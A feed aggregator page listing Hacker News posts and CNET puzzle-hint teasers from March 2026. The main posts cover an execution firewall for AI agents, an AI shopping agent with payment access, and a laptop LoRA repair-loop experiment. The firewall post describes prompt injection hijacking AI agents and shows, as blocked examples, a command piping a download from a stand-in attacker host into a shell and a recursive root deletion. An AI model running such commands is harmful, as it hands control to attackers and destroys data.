Feed aggregator

Execwall – firewall to stop ModelScope CVE-2026-2256 (AI agent command injectn)

Hacker News - Fri, 03/13/2026 - 7:16pm

CVE-2026-2256 just dropped - a prompt injection in ModelScope's ms-agent allows arbitrary OS command execution. CVSS 6.5, no auth required.

This is exactly why I built Execwall: an execution firewall for AI agents. The problem: AI agents that can execute code are one prompt injection away from rm -rf /. The solution: A security layer directly embedded in the shell and between app and kernel: - Seccomp-BPF filtering - Block dangerous syscalls before they execute - Policy engine - Regex allowlist/denylist for commands embedded in shell - Namespace isolation - Python sandbox with separate mount/PID/network - Rate limiting - Prevent automated exploitation Even if an attacker injects a malicious prompt, the command gets blocked at the execution firewall: [execwall]$ curl http://evil.com | sh [X] DENIED: Network command blocked by policy [execwall]$ rm -rf / [X] DENIED: Recursive deletion blocked Written in Rust. Works with any LLM agent framework. GitHub: https://github.com/sundarsub/execwall CVE details: https://radar.offseq.com/threat/cve-2026-2256-cwe-94-improper-control-of-generatio-97245d82

Comments URL: https://news.ycombinator.com/item?id=47371292

Points: 1

# Comments: 0

Categories: Hacker News

Ask HN: Has anyone built an AI agent that spends real money?

Hacker News - Fri, 03/13/2026 - 7:16pm

I want to build an AI agent that shops autonomously – you give it a card once, and it handles browsing, selecting, and paying on its own.

I've been working on an MCP server that connects AI agents to payment providers (Stripe, PayPal, virtual cards), but

I keep hitting walls:

- Card issuers won't respond to individual developers

- Stripe requires 3D Secure for off-session payments

- E-commerce sites block browser automation

- Amazon v. Perplexity (March 9) confirmed that browser automation on major platforms carries real legal risk

Meanwhile Visa announced "Intelligent Commerce" and Mastercard launched "Agent Pay" – the networks see this coming, but the developer tooling isn't there yet. Has anyone actually shipped something like this? Concrete links, working examples, or constructive feedback would be especially helpful.

- What payment rail did you use?

- Is this a viable product or a regulatory minefield?

- Would you trust an AI with a $500 prepaid card to buy something for you?

What I have so far: https://github.com/xodn348/clawpay

Comments URL: https://news.ycombinator.com/item?id=47371289

Points: 1

# Comments: 0

Categories: Hacker News

Stop repeating yourself to Claude Code

Hacker News - Fri, 03/13/2026 - 7:15pm

Article URL: https://www.gopeek.ai

Comments URL: https://news.ycombinator.com/item?id=47371284

Points: 4

# Comments: 1

Categories: Hacker News

Today's NYT Connections Hints, Answers and Help for March 14, #1007

CNET Feed - Fri, 03/13/2026 - 6:30pm
Here are some hints and the answers for the NYT Connections puzzle for March 14, No. 1007.
Categories: CNET

Today's Wordle Hints, Answer and Help for March 14, #1729

CNET Feed - Fri, 03/13/2026 - 6:30pm
Here are hints and the answer for today's Wordle for March 14, No. 1,729.
Categories: CNET

TinyForge: Letting a 0.8B coding model learn from failure feedback on a MacBook

Hacker News - Fri, 03/13/2026 - 6:29pm

I ran a small experiment with tiny language models and got results that surprised me.

Setup:

Model: Qwen 3.5 0.8B (4-bit) Hardware: MacBook Air M4 RAM: ~6GB runtime Task: HumanEval coding problems

Loop:

-Model writes a solution -Code is executed against tests -If it fails, the model sees the exact failure (input, expected output, actual output) -It retries several times (small evolutionary search) -Broken solutions are paired with repaired versions -LoRA train on those repair pairs

Training data was extremely small.

-13 repair pairs total -~3 minutes of LoRA training on the laptop

Results on HumanEval slices the model never saw:

-Single pass improved from 16/50 → 28/50 -Hardest subset improved from 0/8 → 3/8

What surprised me was where the improvement shows up.

If you just ask the model to generate code once after training, the improvement is modest.

But when you place the trained model back inside the repair loop (where it sees test failures and retries), performance improves significantly. It appears the model isn't memorizing answers. It is learning the pattern of how to use failure feedback to repair code.

Small models don't have the capacity to memorize many solutions, but they can apparently learn the structure of:

"Here is exactly what failed → here is how I fix it."

This might generalize to other domains where automatic verification exists:

-SQL queries -math problems -data transformations -program synthesis

Everything runs locally. No cloud compute or APIs.

Peak memory during training was ~10GB. Runtime inference sits around ~6GB.

Code is here if anyone wants to try it or critique the approach: https://github.com/ranausmanai/tinyforge

Curious if others experimenting with small models have seen similar behavior when training on repair pairs instead of correct answers.

Comments URL: https://news.ycombinator.com/item?id=47370841

Points: 1

# Comments: 0

Categories: Hacker News

Pages